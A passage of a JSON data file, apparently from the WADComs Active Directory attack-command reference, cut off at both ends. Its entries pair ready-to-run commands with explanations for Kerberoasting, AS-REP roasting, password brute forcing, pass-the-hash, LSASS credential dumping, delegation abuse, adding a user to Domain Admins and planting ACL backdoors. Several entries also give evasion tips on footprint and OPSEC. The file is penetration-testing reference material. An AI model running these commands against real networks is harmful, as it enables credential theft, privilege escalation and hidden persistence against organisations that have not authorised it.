eth0\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/"]},{"id":"wadcoms:Rubeus-ASREPRoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-ASREPRoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt","description":"Rubeus' `asreproast` module will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast"]},{"id":"wadcoms:Rubeus-AskTGT","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-AskTGT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Rubeus.exe asktgt /domain:test.local /user:john /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt","description":"Rubeus' `asktgt` module uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asktgt"]},{"id":"wadcoms:Rubeus-Brute","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Brute","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"Rubeus.exe /users:usernames.txt /passwords:passwords.txt /domain:test.local /outfile:found_passwords.txt","description":"Rubeus' `brute` module bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of usernames and a list of passwords.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tPassword List: passwords.txt\n\n\tOutput File: found_passwords.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#brute"]},{"id":"wadcoms:Rubeus-Kerberoast","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Kerberoast","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"Rubeus.exe kerberoast /outfile:hashes.txt","description":"Rubeus' `kerberoast` module will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline. The following command is run on a Windows machine in the victim domain.\n\nCommand Reference:\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#kerberoast"]},{"id":"wadcoms:Rubeus-s4u","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-s4u","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement","Privilidge Escalation"],"command":"Rubeus.exe s4u /user:john$ /aes256:2a3de7fe356ee524cc9f3d579f2e0aa7 /impersonateuser:Administrator /msdsspn:time/dc.test.local /altservice:ldap /ptt","description":"Rubeus' `s4u` module performs Kerberos constrained delegation attacks using the S4U2Self and S4U2Proxy. This technique abuses accounts configured with delegation privileges (msDS-AllowedToDelegateTo) to impersonate any domain user and further alter the service specified since SPNs are stored in plaintext and thus access any service on the target system as any user\n\nCommand Reference:\n\n\tDomain: test.local\n\n SPN: time/dc.test.local\n\n alternative service: ldap(can chose any valid services such as HTTP for remoting access)\n\n\tUsername: john$\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username","target","service"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation"]},{"id":"wadcoms:SMBClient-Enum-Share-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\public -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `public` using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: public\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"]},{"id":"wadcoms:SMBClient-Enum-Share","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-Enum-Share","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient \\\\\\\\test.local\\\\C$ -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will connect to an SMB share `C$` using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tSMB Share: C$\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"]},{"id":"wadcoms:SMBClient-List-Share-PTH","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Share-PTH","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\10.10.10.1 -U test.local/john --pw-nt-hash XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target ip using user John hash on test domain.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n","mitre":[],"requires":["Username","Hash"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBClient-List-Shares-Anonymous","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -N","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using anonymous login.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBClient-List-Shares","toolId":"wadcoms:SMBClient","toolName":"SMBClient","name":"SMBClient-List-Shares","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"smbclient -L \\\\test.local -I 10.10.10.1 -U john password123","description":"Smbclient is a tool used to communicate with SMB servers. The following command will list out all available shares on the target server using valid credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html"]},{"id":"wadcoms:SMBMap-Enum-File","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-File","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -F password","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for files and filenames containing the keyword 'password'.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SMBMap-Enum-Share-Anonymous","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share-Anonymous","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, without credentials (null session).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SMBMap-Enum-Share","toolId":"wadcoms:SMBMap","toolName":"SMBMap","name":"SMBMap-Enum-Share","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbmap.py --host-file smb-hosts.txt -u john -p 'password123' -d test.local -L","description":"SMBMap is a tool used to enumerate SMB share drives, including listing share drive permissions, share contents, upload/download functionality, file name enumeration, and remote command execution. The following command will enumerate a list of SMB hosts for accessible SMB shares, both local and mapped drives, using valid credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tSMB Hosts: smb-hosts.txt\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"]},{"id":"wadcoms:SafetyKatz","toolId":"wadcoms:SafetyKatz","toolName":"SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"safetykatz.exe \"privilege::debug\" \"sekurlsa::evasive-logonpasswords\" \"exit\"","description":"SafetyKatz.exe is part of the GhostPack suite of tools and is a combination of SharpDump and Mimikatz. The following command will dump the LSASS process and run Mimikatz to extract credentials from the dumped process. Safetykatz also supports a number of mimikatz native commands such as \"sekurlsa::evasive-keys\" etc. The evasive switch in lab and production enviroments up to windows 2016 has been noted to successfully run where the non \"evasive\" switches had not\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:Seatbelt","toolId":"wadcoms:Seatbelt","toolName":"Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Seatbelt.exe -group=all -full > output.txt","description":"Seatbelt.exe is part of the GhostPack suite of tools that will perform a lot of \"safety checks\" on the Windows host and collect system data that could be useful for potential privilege escalation or persistence methods. The following command will run all checks on the system and store the output in a file (WARNING: will collect a lot of data. remove `-full` for less output).\n\nCommand Reference:\n\n\tRun all checks: -group=all\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpDump","toolId":"wadcoms:SharpDump","toolName":"SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpDump.exe","description":"SharpDump.exe is part of the GhostPack suite of tools and is a C# port of PowerSploit's Out-Minidump.ps1. It can dump the process for LSASS or a specific process given it's PID. This dump can then be fed into mimikatz to extract sensitive information. The following command simply dumps the LSASS process.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpHound-LDAP","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound-LDAP","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --LdapUsername john --LdapPassword password123 --ZipFileName output.zip","description":"SharpHound.exe is the official data collector for BloodHound, written in C# and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and will use the provided LDAP credentials when performing LDAP collection methods, and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tLDAP Username: john\n\n\tLDAP Password: password123\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell","Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html"]},{"id":"wadcoms:SharpHound","toolId":"wadcoms:SharpHound","toolName":"SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation","Enumeration"],"nativeCategory":["PrivEsc","Enumeration"],"command":"SharpHound.exe --CollectionMethods All --ZipFileName output.zip\n#Using PowerShell module\npowershell -ep bypass \n.\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -Domain domain.tld -ZipFileName output.zip","description":"SharpHound.exe and SharpHound.ps1 are the official data collector for BloodHound, written in C# or Powershell and uses Windows API functions and LDAP namespace functions to collect data from domain controllers and domain-joined Windows systems. This data can then be fed into BloodHound to enumerate potential paths of privilege escalation. The following command peforms all collection methods and stores the output in a zip file that can be directly placed in the BloodHound GUI.\n\nCommand Reference:\n\n\tOutput File: output.zip\n","mitre":[],"requires":["Shell"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"]},{"id":"wadcoms:SharpLDAPmonitor","toolId":"wadcoms:SharpLDAPmonitor","toolName":"SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"SharpLDAPmonitor.exe /dcip:10.10.10.1 /user:TEST.local\\john /pass:password123","description":"SharpLDAPmonitor.exe allows you to monitor creation, deletion and changes to LDAP objects live during your pentest.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["LDAP","Kerberos","NTLM"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"]},{"id":"wadcoms:SharpUp","toolId":"wadcoms:SharpUp","toolName":"SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"SharpUp.exe > output.txt","description":"SharpUp.exe is part of the GhostPack suite of tools and is a C# port of PowerUp that will perform numerous privilege escalation checks. The following command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:SharpWMI","toolId":"wadcoms:SharpWMI","toolName":"SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"SharpWMI.exe action=query query=\"select * from win32_process\"","description":"SharpWMI.exe is part of the GhostPack suite of tools that provides WMI functionality, such as local/remote WMI queries, remote WMI process creation, and remote execution of arbitrary VBS through WMI events. The following command will simply list all processes running on the local system.\n\nCommand Reference:\n\n\tGet all processes: \"select * from win32_process\"\n","mitre":[],"requires":["Shell"],"services":["WMI"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"]},{"id":"wadcoms:Snaffler","toolId":"wadcoms:Snaffler","toolName":"Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"Snaffler.exe -s -o snaffler_output.log -d test.local -c 10.10.10.1","description":"Snaffler is a tool used to enumerate sensitive data (passwords, PII, etc.) from file shares in Active Directory. It searches for interesting files based on file extensions, file names, and file content that's matched against regex. It's also highly configurable, allowing you to add your own regex searches. The following command will enumerate all machines in the domain and search for accessible file shares, checking for interesting files that might have sensitive data.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: 10.10.10.1\n","mitre":[],"requires":["Shell"],"services":["SMB"],"references":["https://github.com/SnaffCon/Snaffler"]},{"id":"wadcoms:Windapsearch","toolId":"wadcoms:Windapsearch","toolName":"Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 windapsearch --dc-ip 10.10.10.1 -u test.local\\\\john -p password123 -U -G --da -m \"Remote Desktop Users\" -C -r","description":"windapsearch enumerates users, groups, and computers from a Windows domain through LDAP queries. The following command enumerates all 3 of the above mentioned using provided credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tEnum Users: -U\n\n\tEnum Groups: -G\n\n\tEnum Domain Admins: --da\n\n\tEnum members of group: -m \"Remote Desktop Users\"\n\n\tEnum Computers and resolve DNS: -C -r\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"]},{"id":"wadcoms:bloodyAD-Wite-Properties","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-Wite-Properties","source":"WADComs","platform":["Linux"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"bloodyAD --host 10.10.10.1 -d test.local -u john -p password123 -d test.local get writable --detail","description":"BloodyAD can be used to set, write and delete properties of objects in AD. Given a user:pass, you can use bloodyAD to which objects and what properties of\nthose objects are writeable to the user:pass given. Thus if you use -u john -p john, this command will show you what objects and properties\ncan john write to\n\nCommand Reference:\n Target IP: 10.10.10.1\n\n\tDomain: test.local\n\n Username: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad"]},{"id":"wadcoms:enum4linux-ng","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"enum4linux-ng","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"enum4linux-ng 10.10.10.1","description":"enum4linux-ng is a modern reimplementation of enum4linux written in Python3. It is used to enumerate information from Windows and Samba systems, providing cleaner output and better support for modern protocols. The following command performs a full unauthenticated enumeration of the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/cddmp/enum4linux-ng"]},{"id":"wadcoms:lsassy-credsdump","toolId":"wadcoms:lsassy","toolName":"lsassy","name":"lsassy-credsdump","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"lsassy -u john -p password123 -d test.local 10.10.10.1","description":"\"lsassy is a tool written in python released in 2021 to provide a varity of methods to dump credintials from a single/multiple remote targets. It uses a varity of differnt tactics that provide OPSEC benefits in some cases while also providing the operator options in how it executes remotely, which method it uses as well as the ability to replace the inbuild binaries with your own very easily. Note that if you had introduced nxc into the enviroment previously, then youre encouraged for OSPEC gains to use the built in lsass module. This holds true for many sources in this project that if you had introduced x y z tool; you are better off continuing to use those instead of constantly introducing new ones\"\n\nCommand reference:\n Password: password123\n Username: john\n Domain: test.local\n Target: 10.10.10.1\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos","NTLM"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"]},{"id":"wadcoms:targetedKerberoast","toolId":"wadcoms:targetedKerberoast","toolName":"targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 targetedKerberoast.py -d test.local -u john -p password123 --dc-ip 10.10.10.1","description":"targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print \"kerberoast\" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the \"kerberoast\" hash, and delete the temporary SPN set for that operation.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"]},{"id":"wadcoms:winPEAS","toolId":"wadcoms:winPEAS","toolName":"winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"winpeas.exe cmd > output.txt","description":"winpeas.exe is a script that will search for all possible paths to escalate privileges on Windows hosts. The below command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tRun all checks: cmd\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"]},{"id":"wadcoms:adidnsdump-Enum","toolId":"wadcoms:adidnsdump","toolName":"adidnsdump","name":"adidnsdump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# List available DNS zones\nadidnsdump -u 'test.local\\john' -p password123 --print-zones ldap://10.10.10.1\n# Dump the default zone; -r resolves nodes hidden from the unauthenticated listing (records.csv)\nadidnsdump -u 'test.local\\john' -p password123 -r ldap://10.10.10.1","description":"adidnsdump (dirkjanm) abuses the fact that any authenticated domain user can read the AD-integrated DNS zones (stored in the DomainDnsZones/ForestDnsZones partitions), effectively performing a zone transfer without being a DNS admin. Records whose node name is hidden from the anonymous listing are still enumerable and can be resolved by adding -r, which issues a live DNS query for each hidden node. This maps internal hostnames to IPs for target selection; results are written to records.csv. Use --print-zones first to see which zones exist.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1590.002"],"requires":["Username","Password"],"services":["DNS","LDAP"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"added":true},{"id":"wadcoms:bloodyAD-AddComputer","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddComputer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Create a computer account (returns the new SAM account name and password)\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add computer EVILPC 'Password123!'","description":"bloodyAD's `add computer` action creates a new machine account in the domain over LDAP. Any authenticated user can create up to ms-DS-MachineAccountQuota (default 10) computer accounts, so this is a reliable way to obtain an attacker-controlled principal for RBCD, shadow-credential, or S4U abuse chains. The created computer account has a known password you control. Check the MachineAccountQuota before use; a value of 0 blocks this.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:bloodyAD-AddGenericAll","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGenericAll","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Execution"],"nativeCategory":["PrivEsc","Persistence","Exploitation"],"command":"# Grant john GenericAll over the victim object\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `add genericAll` action writes a new ACE granting a trustee full control (GenericAll) over a target object's DACL via LDAP. Use it to escalate a lesser right (WriteDacl / WriteOwner) into full control over a user, group, or computer, or to establish a durable ACL backdoor for persistence. Once you hold GenericAll you can reset passwords, set shadow credentials, or configure RBCD on the target.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-AddGroupMember","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGroupMember","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Add yourself (john) to a group you can write to\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add groupMember 'Domain Admins' john","description":"bloodyAD's `add groupMember` action writes the `member` attribute of a group over LDAP, adding an arbitrary principal (typically yourself) to it. Use it when BloodHound shows you hold GenericAll, GenericWrite, WriteOwner, or Self/AddMember over a privileged group such as an admin or Remote Management group. Adding your account to a high-value group is a direct privilege-escalation primitive; remove yourself afterward to reduce footprint.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget group: Domain Admins","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-AddRBCD","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddRBCD","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Allow EVILPC$ to act on behalf of others against DC01$\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add rbcd 'DC01$' 'EVILPC$'","description":"bloodyAD's `add rbcd` action writes the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a target computer over LDAP, configuring Resource-Based Constrained Delegation so that a controlled service account may impersonate any user to that machine. Combine with an attacker-controlled computer account (see bloodyAD add computer) and Impacket getST -impersonate to obtain a service ticket as a local admin. Requires GenericWrite / GenericAll / WriteProperty over the target computer object.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget computer: DC01$\n\n\tControlled service: EVILPC$","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true},{"id":"wadcoms:bloodyAD-DontReqPreauth","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-DontReqPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# Enable targeted AS-REP roasting on the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add uac victim -f DONT_REQ_PREAUTH","description":"bloodyAD's `add uac` action with the `-f DONT_REQ_PREAUTH` flag sets the DONT_REQ_PREAUTH bit in a target user's userAccountControl over LDAP, disabling Kerberos pre-authentication. This is a targeted AS-REP roasting primitive: once the flag is set you can request an AS-REP for the account and crack it offline. Requires GenericWrite / write access to the target's userAccountControl; remove the flag afterward to clean up.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: 